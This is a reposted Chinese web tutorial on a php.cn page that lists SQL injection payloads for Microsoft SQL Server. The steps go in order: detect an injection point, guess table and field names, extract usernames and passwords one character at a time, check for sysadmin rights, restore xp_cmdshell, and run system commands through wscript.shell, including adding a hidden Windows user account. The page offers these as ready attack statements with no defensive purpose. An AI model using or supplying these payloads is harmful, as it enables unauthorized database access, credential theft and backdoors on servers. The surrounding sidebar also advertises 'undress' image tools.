常用SQL注射语句解析_MySQL-MySQL-Tutorial-php.cn

Heim

Datenbank

MySQL-Tutorial

常用SQL注射语句解析_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 01:51 PM

bitsCN.com

　SQL注射语句
　　1.判断有无注入点

　　' ; and 1=1 and 1=2

　　2.猜表一般的表的名称无非是admin adminuser user pass password 等..

　　and 0(select count(*) from *)

　　and 0(select count(*) from admin) ---判断是否存在admin这张表

　　3.猜帐号数目如果遇到0

　　and 0

　　and 1

　　4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称。

　　and 1=(select count(*) from admin where len(*)>0)--

　　and 1=(select count(*) from admin where len(用户字段名称name)>0)

　　and 1=(select count(*) from admin where len(密码字段名称password)>0)

　　5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止

　　and 1=(select count(*) from admin where len(*)>0)

　　and 1=(select count(*) from admin where len(name)>6) 错误

　　and 1=(select count(*) from admin where len(name)>5) 正确长度是6

　　and 1=(select count(*) from admin where len(name)=6) 正确

　　and 1=(select count(*) from admin where len(password)>11) 正确

　　and 1=(select count(*) from admin where len(password)>12) 错误长度是12

　　and 1=(select count(*) from admin where len(password)=12) 正确

　　6.猜解字符

　　and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位

　　and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位

　　就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

　　and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

　　这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

　　看服务器打的补丁=出错了打了SP4补丁

　　and 1=(select @@VERSION)--

　　看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。

　　and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--

　　判断连接数据库帐号。（采用SA账号连接返回正常=证明了连接账号是SA）

　　and 'sa'=(Select System_user)--

　　and user_name()='dbo'--

　　and 0(select user_name()--

　　看xp_cmdshell是否删除

　　and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND

　　name = 'xp_cmdshell')--

　　xp_cmdshell被删除，恢复,支持绝对路径的恢复

　　;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

　　;EXEC master.dbo.sp_addextendedproc

　　'xp_cmdshell','c:/inetpub/wwwroot/xplog70.dll'--

　　反向PING自己实验

　　;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec

　　sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

　　加帐号

　　;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

　　jiaoniang$ 1866574 /add'--

　　创建一个虚拟目录E盘：

　　;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod

　　@o, 'run', NULL,' cscript.exe c：/inetpub/wwwroot/mkwebdir.vbs -

bitsCN.com

Stellungnahme

Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Verwandter Artikel

Wie verändern Sie eine Tabelle in MySQL mit der Änderungstabelleanweisung?Mar 19, 2025 pm 03:51 PM

In dem Artikel werden mithilfe der Änderungstabelle von MySQL Tabellen, einschließlich Hinzufügen/Löschen von Spalten, Umbenennung von Tabellen/Spalten und Ändern der Spaltendatentypen, erläutert.

Wie konfiguriere ich die SSL/TLS -Verschlüsselung für MySQL -Verbindungen?Mar 18, 2025 pm 12:01 PM

In Artikel werden die Konfiguration der SSL/TLS -Verschlüsselung für MySQL, einschließlich der Erzeugung und Überprüfung von Zertifikaten, erläutert. Das Hauptproblem ist die Verwendung der Sicherheitsauswirkungen von selbstsignierten Zertifikaten. [Charakterzahl: 159]

Wie behandeln Sie große Datensätze in MySQL?Mar 21, 2025 pm 12:15 PM

In Artikel werden Strategien zum Umgang mit großen Datensätzen in MySQL erörtert, einschließlich Partitionierung, Sharding, Indexierung und Abfrageoptimierung.

Was sind einige beliebte MySQL -GUI -Tools (z. B. MySQL Workbench, PhpMyAdmin)?Mar 21, 2025 pm 06:28 PM

In Artikel werden beliebte MySQL -GUI -Tools wie MySQL Workbench und PhpMyAdmin beschrieben, die ihre Funktionen und ihre Eignung für Anfänger und fortgeschrittene Benutzer vergleichen. [159 Charaktere]

Wie lassen Sie eine Tabelle in MySQL mit der Drop -Tabelle -Anweisung fallen?Mar 19, 2025 pm 03:52 PM

In dem Artikel werden in MySQL die Ablagerung von Tabellen mithilfe der Drop -Tabellenerklärung erörtert, wobei Vorsichtsmaßnahmen und Risiken betont werden. Es wird hervorgehoben, dass die Aktion ohne Backups, die Detaillierung von Wiederherstellungsmethoden und potenzielle Produktionsumfeldgefahren irreversibel ist.

Wie repräsentieren Sie Beziehungen mit fremden Schlüsseln?Mar 19, 2025 pm 03:48 PM

In Artikeln werden ausländische Schlüssel zur Darstellung von Beziehungen in Datenbanken erörtert, die sich auf Best Practices, Datenintegrität und gemeinsame Fallstricke konzentrieren.

Wie erstellen Sie Indizes für JSON -Spalten?Mar 21, 2025 pm 12:13 PM

In dem Artikel werden in verschiedenen Datenbanken wie PostgreSQL, MySQL und MongoDB Indizes für JSON -Spalten in verschiedenen Datenbanken erstellt, um die Abfrageleistung zu verbessern. Es erläutert die Syntax und die Vorteile der Indizierung spezifischer JSON -Pfade und listet unterstützte Datenbanksysteme auf.

Wie sichere ich mich MySQL gegen gemeinsame Schwachstellen (SQL-Injektion, Brute-Force-Angriffe)?Mar 18, 2025 pm 12:00 PM

Artikel erläutert die Sicherung von MySQL gegen SQL-Injektions- und Brute-Force-Angriffe unter Verwendung vorbereiteter Aussagen, Eingabevalidierung und starken Kennwortrichtlinien (159 Zeichen).

See all articles

Heiße KI -Werkzeuge

Undresser.AI Undress

KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover

Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool

Ausziehbilder kostenlos

Clothoff.io

KI-Kleiderentferner

AI Hentai Generator

Erstellen Sie kostenlos Ai Hentai.

Heißer Artikel

R.E.P.O. Energiekristalle erklärten und was sie tun (gelber Kristall)

3 Wochen vorBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Beste grafische Einstellungen

3 Wochen vorBy尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle -Lösung

1 Wochen vorByDDD

R.E.P.O. So reparieren Sie Audio, wenn Sie niemanden hören können

3 Wochen vorBy尊渡假赌尊渡假赌尊渡假赌

Wo kann man die Kransteuerungsschlüsselkarten in Atomfall finden

1 Wochen vorByDDD

Heiße Werkzeuge

SAP NetWeaver Server-Adapter für Eclipse

Integrieren Sie Eclipse mit dem SAP NetWeaver-Anwendungsserver.

mPDF

mPDF ist eine PHP-Bibliothek, die PDF-Dateien aus UTF-8-codiertem HTML generieren kann. Der ursprüngliche Autor, Ian Back, hat mPDF geschrieben, um PDF-Dateien „on the fly“ von seiner Website auszugeben und verschiedene Sprachen zu verarbeiten. Es ist langsamer und erzeugt bei der Verwendung von Unicode-Schriftarten größere Dateien als Originalskripte wie HTML2FPDF, unterstützt aber CSS-Stile usw. und verfügt über viele Verbesserungen. Unterstützt fast alle Sprachen, einschließlich RTL (Arabisch und Hebräisch) und CJK (Chinesisch, Japanisch und Koreanisch). Unterstützt verschachtelte Elemente auf Blockebene (wie P, DIV),

Notepad++7.3.1

Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 Mac-Version

Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

Sicherer Prüfungsbrowser

Safe Exam Browser ist eine sichere Browserumgebung für die sichere Teilnahme an Online-Prüfungen. Diese Software verwandelt jeden Computer in einen sicheren Arbeitsplatz. Es kontrolliert den Zugriff auf alle Dienstprogramme und verhindert, dass Schüler nicht autorisierte Ressourcen nutzen.

Heiße Themen

Wo ist der Login-Zugang für Gmail-E-Mail?

7416

CakePHP-Tutorial

1359

Wie lautet das Format des Kontonamens von Steam?

Win11 -Aktivierungsschlüssel dauerhaft